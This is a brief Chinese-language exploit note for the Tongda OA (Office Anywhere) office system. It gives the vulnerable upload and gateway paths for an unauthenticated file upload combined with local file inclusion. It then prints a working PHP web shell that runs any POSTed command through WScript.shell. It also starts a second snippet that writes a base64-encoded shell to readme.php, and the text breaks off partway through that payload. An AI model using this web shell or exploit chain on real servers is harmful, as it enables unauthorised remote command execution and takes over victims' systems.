OA-通达-RCE | Office Anywhere网络智能办公系统 后台Getshell 无需身份认证 任意文件上传防御/ispirit/im/upload.php 本地文件包含漏洞/ispirit/interface/gateway.php 命令执行绕过: <?php $command=$_POST['cmd']; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> GetWebshel​​l <?php $fp = fopen('readme.php', 'w'); $a = base64_decode("PD9waHAKQGV